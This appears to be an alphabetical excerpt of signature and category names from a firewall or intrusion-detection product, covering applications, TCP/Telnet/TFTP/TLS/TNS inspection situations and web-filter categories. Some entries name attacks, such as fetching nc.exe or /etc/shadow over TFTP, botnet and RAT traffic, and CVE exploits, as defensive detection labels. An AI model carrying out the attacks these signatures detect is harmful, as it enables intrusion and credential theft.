Tagoo
TagWorld
Take-the-Interview
Take-Two Interactive Software
TakingITGlobal
Takipi
Talent-International
TalentDesk
TalentHarness
TalentLMS
Talentsquare
Taleo-Business-Edition
TalesRunner
Talisma-Fundraising
Talk-City
Talkdesk
Talkingpoint
Tallentflow
Talouselama
Taloussanomat
Talygen
Tangerine
Tango-Card
Tango-Messenger
Tangoe
Tantum
Taobao
TapAd
TapAnalytics
Tapatalk
TapClicks
TapCrowd
Tapjoy---Mobile-Developers
TappIn
Taptera
TargetEveryOne
TargetProcess
TargetX
Tarsnap
Task Execution Failed
Task Execution Succeeded
Task Host
TaskAnyone
TaskforceApp
TaskStream
Tasktop-Sync
TASS.web
Tasteless
TATA-Consultancy-Services
Tata-Docomo
Taulia
TaxCloud
Tcould
TCP_Active-RTO
TCP_Checksum-Mismatch
TCP_Client-Data-Missing
TCP_Connection-Loose-Discarded
TCP_Connections-Too-Many
TCP_Empty-FIN-Segment-Content-Conflict
TCP_FIN-Data-After
TCP_Future-Acknowledgement-Number-Always
TCP_Future-Acknowledgement-Number-Graceful
TCP_Future-Acknowledgement-Number-Never
TCP_Handshake-Not-Seen-Always
TCP_Handshake-Not-Seen-Graceful
TCP_Handshake-Not-Seen-Never
TCP_Header-Length-Error
TCP_Initial-Window-Too-Large
TCP_Initial-Window-Too-Many-Segments
TCP_Microsoft-Windows-Timestamp-Code-Execution
TCP_Option-Invalid
TCP_Option-Too-Long
TCP_Option-Too-Short
TCP_Option-Unhandled
TCP_Option-Unknown
TCP_Option-Unsupported
TCP_Options-Detected
TCP_Options-Length-Inconsistency
TCP_Options-Unused
TCP_Portscan_End
TCP_Portscan_Started
TCP_Segment-ACK-Expected
TCP_Segment-Content-Conflict
TCP_Segment-Invalid
TCP_Segment-Nonzero-ACK-Value
TCP_Segment-SYN-ACK-Unexpected
TCP_Segment-SYN-Fragmented
TCP_Segment-SYN-ISN-Mismatch
TCP_Segment-SYN-No-Options
TCP_Segment-SYN-Options-Conflict
TCP_Segment-SYN-Unexpected
TCP_Segment-SYN-Unexpected-Reply
TCP_Segment-SYNACK-ISN-Mismatch
TCP_Segment-Unexpected-ACK
TCP_Segment-Unexpected-ACK-In-Loose-Mode
TCP_Segment-Unexpected-After-SYN
TCP_Server-Data-Missing
TCP_Small-Overlapping-Segment
TCP_SSM_Connections-Too-Many
TCP_Stealth_Scan_Started
TCP_Strict-Without-Handshake
TCP_Strict_Connections-Too-Many
TCP_SYN-ACK-With-Data
TCP_SYN-RST-Split-Handshake
TCP_SYN-With-Data
TCP_SYN_Scan_Started
TCP_Timeout-Connection-Automatic-Establishment-Default
TCP_Timeout-Connection-Dropped
TCP_Timeout-Connection-Dropped-Short
TCP_Timeout-Data-Transfer
TCP_Timeout-Data-Transfer-Long
TCP_Timeout-Default-Idle
TCP_Timeout-FIN
TCP_Timeout-FIN-Long
TCP_Timeout-REMOVE_SOON-Wait-Default
TCP_Timeout-REMOVE_SOON-Wait-Long
TCP_Timeout-SYN-ACK-Default
TCP_Timeout-SYN-ACK-Long
TCP_Timeout-SYN-Default
TCP_Timeout-SYN-RST-Default
TCP_Timeout-SYN-RST-Disabled
TCP_Timeout-TIME-WAIT-Default
TCP_Too-Many-Small-Segments
TCP_Urgent
TCP_Window-Exceeded
TCP_Window-Shrinked
TCP_Window-Small
TCP_Window-Too-Large
TD---Advisor-Services
Td-Ameritrade
TeacherEase
Teachertube
TeachingBooks.net
Teads
Tealium
Team-Gantt
Team-on-the-Run
Team-Org-Chart
Teambook
TeamDesk
TeamDrive
Teamgate.com
Teamly
teamspace
TeamSpeak-3
TeamSupport
Teamtalk
Teamup
TeamViewer
TeamViewer
TeamWork-Live
Teamwork.com
TeamWox
Teamxbox
Tecent-QQ-International
Tecent-Qzone
Tech-Data
TechCrunch
TechExcel
Techinline-Remote-Desktop
TechnologyOne
Technorati
TechSoup
TechTarget
Ted.com
Teen-Health-and-Wellness
Telcoworx
Telecom-Italia
Telefonica-Cloud
Telegram
Telegram Desktop
Telegraph-Online
TeleManagement-Technologies
TeleMessage
Telenet-Webmail
TeleSign
Telestream
Telias
Telit
Tellonym
Telmex
Telnet
Telnet
Telnet_CCS-Kerberos-Authentication-Bypass
Telnet_CCS-Ld-Library-Path-Attack
Telnet_CCS-Livingston-Reboot-DoS
Telnet_CCS-NTLM-Authentication-Usage
Telnet_CCS-Resolv-Host-Conf-Disclosure
Telnet_CCS-Solaris-Telnet-Passwordless-Remote-Access
Telnet_CCS-Suspicious-Authentication-Request
Telnet_CCS-Very-Long-Login-Name
Telnet_CS-Cisco-Adaptive-Security-Appliance-Invalid-CLI-Command
Telnet_CS-Cisco-IOS-Telnet-Denial-of-Service
Telnet_CS-Eclipse-Equinoxe-OSGi-Console-Command-Execution
Telnet_CS-GAMSoft-TelSrv-Username-Buffer-Overflow
Telnet_CS-GE-D20-Feature-Request
Telnet_CS-GE-D20-Reboot
Telnet_CS-GE-D20-Remote-Diagnostic-Self-Test
Telnet_CS-Linksys-WAP610N-Unauthenticated-Root-Access
Telnet_CS-Mirai-Botnet-C-And-C-Traffic
Telnet_CS-Polycom-Shell-HDX-Series-Traceroute-Command-Execution
Telnet_CS-SAGEM-Router-Fast-3304-3464-3504-Authentication-Bypass
Telnet_CS-Samsung-Data-Manager-Default-Root-Password
Telnet_CS-Scadatec-Limited-Procyon-Buffer-Overflow
Telnet_CS-Schweitzer-SEL-2032-File-Upload
Telnet_CS-Schweitzer-SEL-2032-Session-Logout
Telnet_CS-Schweitzer-SEL-2032-Status-Command
Telnet_CS-Shared-Variables
Telnet_CS-Verso-NetPerformer-Telnet-Buffer-Overflow-Vulnerability
Telnet_CS-Windows-Telnet-Service-Buffer-Overflow-Vulnerability-CVE-2015-0014
Telnet_CSCS-Multiple-Vendors-BSD-Telnetd-Encryption-Key-Buffer-Overflow
Telnet_CTS-Default-IRIX-Account-4dgifts
Telnet_CTS-Default-IRIX-Account-Ezsetup
Telnet_CTS-Default-IRIX-Account-Guest
Telnet_CTS-Default-IRIX-Account-OutOfBox
Telnet_CTS-YoungZSoft-CCProxy-Ping-Hostname-Buffer-Overflow
Telnet_CTS-ZyXEL-VMG4325-B10A-Insecure-Default-Credentials-CVE-2025-0890
Telnet_CTS-ZyXEL-VMG4325-B10A-Telnet-Command-Injection-CVE-2024-40891
Telnet_GE-D20-Clear-Audit-Log-Attempt
Telnet_GE-D20-Configuration-Traffic
Telnet_GE-D20-Display-Access-Change-Attempt
Telnet_GE-D20-Failed-Login
Telnet_GE-D20-Invalid-Command
Telnet_GE-D20-Logoff
Telnet_GE-D20-Successful-Login
Telnet_GE-D20-Update-Date-Time
Telnet_GE-D20-View-Device-Status
Telnet_IRIX-RLD-Format-String
Telnet_Johnson-Controls-CK720-Date-Time-Change
Telnet_Johnson-Controls-CK720-Reboot-Attempt
Telnet_Johnson-Controls-CK720-Successful-Login
Telnet_Johnson-Controls-CK720-Successful-Password-Change
Telnet_Possible-XSS-Script-In-Login
Telnet_Schweitzer-SEL-2032-Access-Attempt
Telnet_Schweitzer-SEL-2032-Access-Denied
Telnet_Schweitzer-SEL-2032-Access-Password-Disabled
Telnet_Schweitzer-SEL-2032-Change-Password
Telnet_Schweitzer-SEL-2032-Configuration-Traffic
Telnet_Schweitzer-SEL-2032-Device-Poll-All
Telnet_Schweitzer-SEL-2032-Failed-Configuration-Change
Telnet_Schweitzer-SEL-2032-Failed-Time-Change
Telnet_Schweitzer-SEL-2032-IP-Address-Change
Telnet_Schweitzer-SEL-2032-Modem-Status-Changed
Telnet_Schweitzer-SEL-2032-Point-Not-Available
Telnet_Schweitzer-SEL-2032-Port-Configuration-Change
Telnet_Schweitzer-SEL-2032-Successful-Configuration-Change
Telnet_Schweitzer-SEL-2032-Successful-Login
Telnet_Schweitzer-SEL-2032-Time-Change
Telnet_Schweitzer-SEL-2032-View-Passwords-Attempt
Telnet_SCS-Microsoft-Telnet-Client-Information-Disclosure
Telnet_SCS-Telnet-Client-Env-Opt-Add-Function-BOF
Telnet_SCS-Telnet-Client-Slc-Add-Reply-Function-BOF
Telnet_Shared-Variables
Telnet_STS-Cisco-Failed-Login
Telnet_STS-Failed-Login
Telnet_STS-Shared-Variables
Telnet_STS-Telnet-Root-Login-Attempt
Telnet_SysV-Login-BOF-1
Telnet_SysV-Login-BOF-2
Telnet_SysV-Login-BOF-3
Telnet_TC-Schneider-Electric-PLC-ETY-Denial-Of-Service
Telnet_Telnet-Cisco-NX-OS-Section-And-Less-Privilege-Escalation
Telnet_Telnet-Usage
Telnet_Truva-Response
Telogis
TelSell
TELUS
TemboSocial
Temu
Tencent-Cloud
Tencent-QQ
Tendenci
Tender-Support
Tenet-Health
Tenfold
Tennessee
Tenrox
Tensoft-Revenue-Cycle-Management
Teradata
Teramind
Terapeak
Teredo
Teredo-Protocol-Authenticated-Traffic
Teredo-Protocol-Bubble-Packet
Teredo-Protocol-Traffic
Test
Test Alert
Test-IO
Testflight
TestFlightApp
Testfuff
TestLodge
TestUP
Tetrinet
Text and Media Messaging
TEXT File
Text-United
Textalk
Textedly
Texthog
Textura-Corp
TFTP
TFTP_CS-Admin-DLL-Download-Request
TFTP_CS-Atftp-TFTP-Server-Error-Packet-DoS
TFTP_CS-Cisco-Prime-Infrastructure-Swimtemp-TFTP-Arbitrary-File-Upload
TFTP_CS-Executable-File-Upload
TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Data-And-Error-Packet-BOF
TFTP_CS-HP-Intelligent-Management-Center-TFTP-Server-Mode-RemoteCodeExec
TFTP_CS-Linux-Kernel-UDP-UFO-Large-Packet-Denial-Of-Service
TFTP_CS-Netgain-Systems-Enterprise-Manager-Tftpserver-Filename-Directory-Traversal
TFTP_CS-Novell-Configuration-Management-Tftpd-Heap-Buffer-Overflow
TFTP_CS-Novell-ZENworks-Desktop-Management-On-Linux-Tftpd-Code-Execution
TFTP_CS-TFTP-Error-Response-With-Same-Source-And-Destination-Ports
TFTP_Distinct-TFTP-Directory-Traversal
TFTP_Filename
TFTP_GE-D20-Config-File-Change-Attempt
TFTP_GE-ProSysInfo-TFTP-Server-TFTPDWIN-Stack-Based-Buffer-Overflow
TFTP_General-Electric-D20-Password-Recovery
TFTP_Get-Boot.ini
TFTP_Get-dllhost.exe
TFTP_Get-Etc-Passwd
TFTP_Get-Etc-Shadow
TFTP_Get-Nc.exe
TFTP_Get-Passwd
TFTP_Get-Svchost.exe
TFTP_Ipswitch-WhatsUp-Gold-TFTP-Directory-Traversal
TFTP_MADCAP-Request-Message-With-Lease-Identifier-Option
TFTP_Microsoft-RIS-TFTP-Write-Access
TFTP_Nessus-Vulnerability-Scanner-Usage
TFTP_NetDecision-TFTP-Directory-Traversal-Execution
TFTP_PacketTrap-TFTP-Server-Denial-Of-Service
TFTP_Read-Or-Write-Request-Excessively-Long-Filename
TFTP_Read_Violation
TFTP_Solarwinds-TFTP-Server-Denial-Of-Service
TFTP_SS-Curl-And-Libcurl-TFTP-blksize-Heap-Buffer-Overflow
TFTP_SS-Executable-File-Download
TFTP_TFTP-Server-Error-Packet-Handling-Buffer-Overflow
TFTP_TFTP32d-Format-String-Vulnerability
TFTP_TFTP32d-Format-String-Vulnerability-Poc
TFTP_Trivial-File-Transfer-Protocol-Directory-Traversal
TFTP_Trivial-File-Transfer-Protocol-Mode-String-Buffer-Overflow
TFTP_UDP-Your-Freedom-UDP-Packet
TFTP_Write_Violation
Thales-e-Security
Thawte-Certifate-Revocation-List-Service
Thawte-Online-Certificate-Status-Service
The-Billing-Bridge
The-College-Board
The-Currentset
The-Friendship-Page
The-Funded
The-Guardian
The-Hello-Bar
The-IdeaWall
The-Invoice-Machine
The-iPad-Receptionist
The-Ladders
The-Life-Cloud
The-Loyalty-Box
The-Motley-Fool
The-National-Association-of-Personal-Financial-Advisors
The-Old-Reader
The-Onion
The-PDF-Chef
The-Pirate-Bay
The-PNC-Financial-Services-Group
The-Receptionist
The-Register
The-Resumator
The-Tax-Institute
The-Verge
The-Wall-Street-Journal
TheCodingMonkeys-Carcassonne
Thelevelup
TheNextUp
TheOfferMachine
ThePDF.com
Therapy-Partner
ThingLink
ThinkFree
ThinkingPhone
Thinkorswim
Thinkstock
ThinkWave
THINQ-Compliance-Manager
Third-Light-IMS
ThisData
ThisMoment-DEC-CMS
Thomson-Reuters
ThoughtBuzz
ThousandEyes
ThreatMetrix
Threatseeker-Cloud
Threatseeker-Data-Provider-Error
Threatseeker-No-Categories
Three.com.hk
Threshold exceeded
Thunderbird
ThunderMaps
ThunderTix
Thwapr
Tibco
Tibia
Tick
Ticketsolve
TicketSource
Tictrac
Tidaltv
TIE-Kinetix
TierraNet
Tietoviikko
TigerConnect
TikTok
time-cockpit
Time-Doctor
Time-Off-Manager
Time-Tracker
Time-Warner-Cable-Personal
Timebridge
TimeCamp
TimeCentre-Enterprise
TimeClock-Plus
TimeDock
TimeForce
TimeForge-Labor-Management-Software
TimeHighway
TimeLog
Timely
Timesheet-Mobile
Timesheet.com-(Tenrox-Time-Tracking)
Timesheets.com
TimeSolv
Timetoast
Timetonote
TimeTrade
TimeXchange
TimingCube
Tinder
TinderBox
TinEye
Tinfoil-Security
Tinypic
TINYpulse
TinyWebGallery
Tipalti
Tissue-Trackcore-by-LPIT-Solutions
TissueApp
Tistory
Titanfile.com
TLS
TLS connection state
TLS Match Stop Condition
TLS-1.0
TLS-1.0-Other
TLS-1.0-Web
TLS-1.1
TLS-1.1-Other
TLS-1.1-Web
TLS-1.2
TLS-1.2-Other
TLS-1.2-Web
TLS-1.3
TLS-1.3-Other
TLS-1.3-Web
TLS-JA3_Apple-IOS-Or-MacOS
TLS-JA3_Apt
TLS-JA3_Chrome
TLS-JA3_Curl
TLS-JA3_DNS_Over_TLS
TLS-JA3_Emotet
TLS-JA3_Firefox
TLS-JA3_Google-Applications
TLS-JA3_Hotspot-Shield
TLS-JA3_Play-Store
TLS-JA3_RevCode-RAT
TLS-JA3_Shoora_VPN
TLS-JA3_Steam
TLS-JA3_TOR
TLS-JA3_TrickBot
TLS-JA3_Troldesh-Malware
TLS-JA3_Ultrasurf
TLS-JA3_Wget
TLS-Other
TLS-SNI_Exim-Remote-Code-Execution-CVE-2019-15846
TLS-SNI_IP-Address-In-SNI
TLS-SNI_Orcus-RAT-Infection-Traffic
TLS-SNI_SNIProxy-New_address-Stack-Buffer-Overflow
TLS-SNI_Snowflake-Proxy
TLS-SNI_Suspicious-Server-Name-Indication
TLS-SNI_Your-Freedom-Network-Query
TLS-SPDY
TLS-Web
TLS_Alert
TLS_Anonymous-Diffie-Hellman
TLS_Certificate-Change-Failed
TLS_Certificate-Syntax-Error
TLS_Certificate-Verify-Error-Overridden
TLS_Certificate-Verify-Failed
TLS_Client-Extension-Heartbeat
TLS_Client-Heartbeat-Message
TLS_Client-Hello
TLS_Client-Hello-No-SNI-Extension
TLS_Client-Hello-Server-Endpoint-Known
TLS_Client-Hello-Server-Endpoint-Unknown
TLS_Client-Hello-SNI-Extension-Invalid-Name-List
TLS_Client-Hello-SNI-Extension-IPv4-Address
TLS_Client-Hello-SNI-Extension-IPv6-Address
TLS_Client-Syntax-Error
TLS_Close-Notify
TLS_Connection-Not-Decrypted-For-Inspection
TLS_CS-Bea-WebLogic-SSL-Handling-Denial-Of-Service
TLS_CS-Cisco-Unified-Communications-Manager-CTL-Provider-Heap-Overflow
TLS_CS-Encrypted_Server_Name_Indicator
TLS_CS-Facebook-Fizz-Early-Data-Integer-Overflow-DoS
TLS_CS-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
TLS_CS-LDAP-Ssl-Library-Malformed-Client-Hello-DoS
TLS_CS-OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability
TLS_CS-OpenSSL-SSL-Check-Chain-Null-Pointer-Dereference
TLS_CS-OpenSSL-TLS-AES-NI-DoS
TLS_CS-OpenSSL-X.509-Punycode-Email-Address-BOF
TLS_CS-Possible-Psiphon-Meek-Domain-Fronting
TLS_CS-Red-Hat-389-Directory-Server-TLS-Resource-Exhaustion
TLS_CS-TOR-Meek-Domain-Fronting
TLS_CS-Trend-Micro-OfficeScan-Console-Authentication-Buffer-Overflow
TLS_CS-Windows-Secure-Channel-Denial-Of-Service-CVE-2024-38148
TLS_CS-Wolfssl-Dopresharedkeys-Psk-Identity-Buffer-Overflow
TLS_CS_Windows-Schannel-Denial-Of-Service-Vulnerability-CVE-2023-21819
TLS_Decrypted-Domain
TLS_Decryption-Disallowed-While-Already-Decrypting
TLS_DH-Nonstandard-Generator
TLS_DH-Not-Suitable-Generator
TLS_DH-P-Not-Prime
TLS_DH-P-Not-Safe-Prime
TLS_Double-Hello
TLS_Early-Data-Rejected
TLS_Early-Data-Seen
TLS_Early-Data-Size-Exceeded
TLS_Empty-Record-Message
TLS_Export-Ciphersuite
TLS_Handshake-Downgraded
TLS_Handshake-Modification-Not-Possible
TLS_Hello-Retry-Request
TLS_Illegal-Parameter
TLS_Incomplete-Configuration-For-Decrypting
TLS_Inspection_Not_Supported
TLS_Invalid-Change-Cipher
TLS_Invalid-Client-Key-Share
TLS_Invalid-Server-Key-Exchange
TLS_Invalid-Server-Key-Share
TLS_MAC-Error
TLS_Memory-Allocation-Error
TLS_No-Cipher-Overlap
TLS_No-Decryption
TLS_Non-Decrypted-Domain
TLS_Non-Decrypted-Issuer
TLS_Non-Decrypted-TLS-Match
TLS_Not-TLS
TLS_Proxy-Redirection-Failed
TLS_Proxy_Authentication_Required
TLS_Server-Certificate-Cached-Processed
TLS_Server-Certificate-Denied-Decryption
TLS_Server-Certificate-Fetching-Processed
TLS_Server-Certificate-Processed
TLS_Server-Certificate-Revoked
TLS_Server-Extension-Heartbeat
TLS_Server-Heartbeat-Message
TLS_Server-Hello
TLS_Server-Protocol-Negotiation-Failed
TLS_Server-Rejected-Early-Data
TLS_Server-Server-Name-Certificate-Mismatch
TLS_Server-Server-Name-Certificate-Mismatch-Overridden
TLS_Server-SNI-Rejected
TLS_Server-Syntax-Error
TLS_Server-Unexpected-Certificate
TLS_SNI-Denied-Decrypting-And-Certificate-Mismatch
TLS_SNI-Denied-Decrypting-And-Certificate-Verify-Failed
TLS_SNI-Processed
TLS_SS-AsyncRAT-Infection-Traffic
TLS_SS-Cobalt-Strike-Self-Signed-TLS-Certificate
TLS_SS-Microsoft-Windows-CryptoAPI-Spoofing-Vulnerability
TLS_SS-Microsoft-Windows-TLS-Key-Exchange-Denial-Of-Service
TLS_SS-OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption
TLS_SS-OpenSSL-X.509-IPAddressFamily-Extension-Parsing-Out-of-Bounds-Read
TLS_SS-OpenSSL-X.509-Punycode-Email-Address-BOF
TLS_SS-Orcus-RAT-Infection-Traffic
TLS_SS-Self-Signed-Certificate-With-Default-Values
TLS_SS-SSL-Certificate-In-Nonstandard-Port
TLS_SS-Supermicro-IPMI-Static-SSL-Certificate
TLS_SS-Suspicious-Common-Name
TLS_SS-Windows-Schannel-Denial-Of-Service-CVE-2023-21818
TLS_SSL-2-0
TLS_SSL-3-0
TLS_SS_Windows-CryptoAPI-Spoofing-Vulnerability-CVE-2022-34689
TLS_STARTTLS-Not-TLS
TLS_Tentative-TLS-Application
TLS_TLS-1-0
TLS_TLS-1-1
TLS_TLS-1-1-Downgrade-Seen
TLS_TLS-1-2
TLS_TLS-1-2-Downgrade-Seen
TLS_TLS-1-3
TLS_Too-Long-Handshake-Message
TLS_Too-Long-Session-Ticket
TLS_Unexpected-Begin-of-Encrypted-Data
TLS_Unexpected-Change-Cipher
TLS_Unexpected-Client-Hello
TLS_Unexpected-Extension
TLS_Unexpected-New-Session-Ticket
TLS_Unknown-Session-Id
TLS_Unknown-Session-Ticket
TLS_Unrecoverable-Error
TLS_Unsupported
TLS_Using-Expired-Server-Credentials
Tmall
TMXmoney
TNS-Metrix
TNS_CS-Oracle-Create-Database-Link-Buffer-Overflow
TNS_CS-Oracle-Database-Core-Rdbms-Component-Denial-Of-Service
TNS_CS-Oracle-Database-Ctxsys.drvdisp.tablefunc_asown-Buffer-Overflow
TNS_CS-Oracle-Database-DBMS-Java.Set-Output-To-Java-Privilege-Escalation
TNS_CS-Oracle-Database-DBMS-Scheduler-Privilege-Escalation
TNS_CS-Oracle-Database-Mdsys.sdo_Topo_Drop_ftbl-SQL-Injection-Vulnerability
TNS_CS-Oracle-Database-Server-Authentication-Username-Buffer-Overflow
TNS_CS-Oracle-Database-Server-DBMS-DCD-PUBLISH-SQL-Injection
TNS_CS-Oracle-Database-Server-Lpxfsmsax-Qname-Stack-Buffer-Overflow
TNS_CS-Oracle-Database-Server-Workspace-Manager-Multiple-SQL-Injection
TNS_CS-Oracle-Database-Server-XDB-Pitrig-Procedures-SQL-Injection
TNS_CS-Oracle-Database-SQL-Compiler-Access-Control-Security-Bypass
TNS_CS-Oracle-Database-Sys.lt.findricset-SQL-Injection
TNS_CS-Oracle-Database-SYS.OLAPIMPL-T-Package-ODCITABLESTART-Buffer-Overflow
TNS_CS-Oracle-Database-XDB-Pitrig-dropmetadata-Procedure-BOF
TNS_CS-Suspicious-Request
TNS_CS_Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection
TNS_NGSS-Driver-Detected
TNS_Oracle-Database-DBMS-AQADM-Sys-SQL-Injection
TNS_Oracle-Database-DBMS-Assert-Filter-Bypass
TNS_Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation
TNS_Oracle-Database-DBMS-JVM-EXP-PERMS-System-Command-Execution
TNS_Oracle-Database-DBMS-Snap-Internal-Package-Buffer-Overflow
TNS_Oracle-Database-DBMS-TNS-Listener-Denial-Of-Service
TNS_Oracle-Database-REPCAT-RPC.VALIDATE-REMOTE-RC-SQL-Injection
TNS_Oracle-Database-Server-Access-Control-Bypass
TNS_Oracle-Database-Server-CREATE-TABLES-SQL-Injection
TNS_Oracle-Database-Server-DBMS-AQELM-Package-Buffer-Overflow
TNS_Oracle-Database-Server-DBMS-CDC-Subscribe-Package-SQL-Injection
TNS_Oracle-Database-Server-DBMS-Metadata-Package-SQL-Injection
TNS_Oracle-Database-Server-LT.ROLLBACKWORKSPACE-SQL-Injection
TNS_Oracle-Database-Server-MD2-Package-Buffer-Overflow
TNS_Oracle-Database-Server-SDO-CS-TRANSFORM-LAYER-Buffer-Overflow
TNS_Oracle-Database-Server-SQL-Query-Directory-Traversal
TNS_Oracle-Database-Server-Sys-DBMS-Metadata-Util-SQL-Injection
TNS_Oracle-Database-Server-Sys-KUPV-SQL-Injection
TNS_Oracle-Database-Server-XDB-Pitrig-truncate-Procedure-Buffer-Overflow
TNS_Oracle-Database-Sys-Pbsde-Init-Procedure-Buffer-Overflow
TNS_Oracle-Database-TNS-Listener-Service-Registration-Lack-Of-Authentication
TNS_Oracle-Oracle-Business-Intelligence-SQL-Injection
TNS_Oracle-Oracle-Database-Server-ctxsys.driload-Access-Violation
TNS_Oracle-Oracle-Database-Server-String-Conversion-Function-BOF
TNS_Oracle-Oracle-Database-Server-Xdb.dbms_xmlschema-Buffer-Overflow
TNS_Oracle-Oracle-Warehouse-Builder-WB_OLAP-SQL-Injection
TNS_Oracle-Oracle-Warehouse-Builder-WB_RT-Multiple-SQL-Injections
TNS_Oracle-SQL-Database-Compromise
TNS_Oracle-Sys-Pbsde-Init-BOF
TNS_Oracle-TNS-Service-Name-BOF
TNS_Oracle10g-TNS-Auth-Sesskey-BOF
TNS_Oracle8i-TNS-Listener-BOF
Toad-World-by-DELL
TodaysMeet
ToDoist
Toggl
TokBox
Tolina
TollFreeForwarding
Tom's-Planner
Too-Files
Toodledo
TOOLS4COM-OIS
Toonimo
Top-Producer-8i
Topi
Topsec
Toptal
TOR
Tor2web
Tor2web-Mirror
Torch-LMS
Tori.fi
Torrent-Root
Torrent2crazy
Torrentbox.com
Torrentmatrix
Torrentportal
Torrentreactor.net
Torrentz
TOSCA-Testsuite
Toshiba-Cloud-Services
Totally.awe.sm
Totango
Totoexpress
Totorosa
TOTUS
Touch-Point-Software
Tour-de-Force
Tour-My-App
Tout
ToutApp
Towbook
Track-It
TrackAbout
Tracker
Tracker-CRM
Tracker-Go
TrackingTime
Trackjs
Trackjumper
Trackolade
Tracks
TrackSmart
Trackur
Trackvia
TRACOM-Learning
TRACT-GoTransverse
Tract-Systems
Traction-Guest
Tractis
Trade-Desk
Trade-Promotion-Optimization-Planner
TradeGecko
TradeKing
TradeLink
Tradepoint-360
Tradeshift
Tradestation
TradingTree
TradingView
Traditional Religions
Tradogram
TrafficJunky
TrainingToday-Enterprise
Trakstar
Transamerica
Transcend
TransEra-HTBasic
Transferbigfiles.com
TransFirst-TransLink
Transfluent
Transifex
Transloadit
TransOps
Transpara
Transporter
TravBuddy
Travel
Travelbooster
Travelocity
Travian
Traxo
TrekkSoft
Trello
Trend-Hunter
Trend-Micro
Trend-Micro-ActiveUpdate
Trend-Micro-Cloud-One
Trend-Micro-License-Update
Trend-Micro-OfficeScan-Management
Trend-Micro-VCS
Trendmicro-Update
Tresorit
Tribal-Fusion
Tribe
Tribehr
TriggerApp
Trillian
Trillian-Web
Trilogy
Trimble
TriNet-Hire
Trinet-Perform
Trintech
Trion-Worlds
TripAdvisor
TripCase
TripIt
Tripleseat
Trippy
Tripwire
Triton-Digital
Trivago
TriWest-Healthcare-Alliance
Trixbox
Tropo
Trove
Truecaller
TrueForms-Online
TrueShare
Trueshare.com
Trulia
Trumba
Truphone-Local-Anywhere
Truprint
TrustedChoice
TrustFax
Trustpilot
Trustwave
TryBooking
TSheets
TSP
TS_Abortion
TS_Abused-Drugs
TS_Adult-Content
TS_Adult-Material
TS_Advanced-Malware-Command-and-Control
TS_Advanced-Malware-Payloads
TS_Advertisements
TS_Advocacy-Groups
TS_Alcohol-and-Tobacco
TS_Alternative-Journals
TS_Application-and-Software-Download
TS_Bandwidth
TS_Blog-Commenting
TS_Blog-Posting
TS_Blogs-and-Personal-Sites
TS_Botnets
TS_Business-and-Economy
TS_Classifieds-Posting
TS_Collaboration-Office
TS_Compromised-Websites
TS_Computer-Security
TS_Content-Delivery-Networks
TS_Cultural-Institutions
TS_Custom-Encrypted-Uploads
TS_Drugs
TS_Dynamic-Content
TS_Dynamic-DNS
TS_Education
TS_Educational-Institutions
TS_Educational-Materials
TS_Educational-Video
TS_Elevated-Exposure
TS_Emerging-Exploits
TS_Entertainment
TS_Entertainment-Video
TS_Extended-Protection
TS_Facebook-Apps
TS_Facebook-Chat
TS_Facebook-Commenting
TS_Facebook-Events
TS_Facebook-Friends
TS_Facebook-Games
TS_Facebook-Groups
TS_Facebook-Mail
TS_Facebook-Photo-Upload
TS_Facebook-Posting
TS_Facebook-Questions
TS_Facebook-Video-Upload
TS_File-Download-Servers
TS_Files-Containing-Passwords
TS_Financial-Data-and-Services
TS_Gambling
TS_Games
TS_Gay-or-Lesbian-or-Bisexual-Interest
TS_General-Email
TS_Generative-AI-Conversation
TS_Generative-AI-Multimedia
TS_Generative-AI-Text-And-Code
TS_Government
TS_Hacking
TS_Health
TS_Hobbies
TS_Hosted-Business-Applications
TS_Illegal-or-Questionable
TS_Information-Technology
TS_Instant-Messaging
TS_Internet-Auctions
TS_Internet-Communication
TS_Internet-Radio-and-TV
TS_Internet-Telephony
TS_Intolerance
TS_Job-Search
TS_Keyloggers
TS_Lingerie-and-Swimsuit
TS_LinkedIn-Connections
TS_LinkedIn-Jobs
TS_LinkedIn-Mail
TS_LinkedIn-Updates
TS_Malicious-Embedded-iFrame
TS_Malicious-Embedded-Link
TS_Malicious-Websites
TS_Marijuana
TS_Media-File-Download
TS_Message-Boards-and-Forums
TS_Militancy-and-Extremist
TS_Military
TS_Miscellaneous
TS_Mobile-Malware
TS_Network-Errors
TS_Newly-Registered-Websites
TS_News-and-Media
TS_Non-HTTP
TS_Non-Traditional-Religions
TS_Nudity
TS_Nutrition
TS_Office-Apps
TS_Office-Documents
TS_Office-Drive
TS_Office-Mail
TS_Online-Brokerage-and-Trading
TS_Organizational-Email
TS_Other-AI-ML-Applications
TS_Parked-Domain
TS_Pay-to-Surf
TS_Peer-to-Peer-File-Sharing
TS_Personal-Network-Storage-and-Backup
TS_Personals-and-Dating
TS_Phishing-and-Other-Frauds
TS_Political-Organizations
TS_Potentially-Exploited-Documents
TS_Potentially-Unwanted-Software
TS_Prescribed-Medications
TS_Private-IP-Addresses
TS_Pro-Choice
TS_Pro-Life
TS_Productivity
TS_Professional-and-Worker-Organizations
TS_Proxy-Avoidance
TS_Real-Estate
TS_Reference-Materials
TS_Religion
TS_Restaurants-and-Dining
TS_Search-Engines-and-Portals
TS_Security
TS_Service-and-Philanthropic-Organizations
TS_Sex
TS_Sex-Education
TS_Shopping
TS_Social-and-Affiliation-Organizations
TS_Social-Networking
TS_Social-Organizations
TS_Social-Web-Facebook
TS_Social-Web-LinkedIn
TS_Social-Web-Twitter
TS_Social-Web-Various
TS_Social-Web-YouTube
TS_Society-and-Lifestyles
TS_Special-Events
TS_Sport-Hunting-and-Gun-Clubs
TS_Sports
TS_Spyware
TS_Streaming-Media
TS_Surveillance
TS_Suspicious-Content
TS_Suspicious-Embedded-Link
TS_Tasteless
TS_Text-and-Media-Messaging
TS_Traditional-Religions
TS_Travel
TS_Twitter-Follow
TS_Twitter-Mail
TS_Twitter-Posting
TS_Unauthorized-Mobile-Marketplaces
TS_Uncategorized
TS_User-Defined
TS_Vehicles
TS_Violence
TS_Viral-Video
TS_Weapons
TS_Web-Analytics
TS_Web-and-Email-Marketing
TS_Web-and-Email-Spam
TS_Web-Chat
TS_Web-Collaboration
TS_Web-Hosting
TS_Web-Images
TS_Web-Infrastructure
TS_Website-Translation
TS_YouTube-Commenting
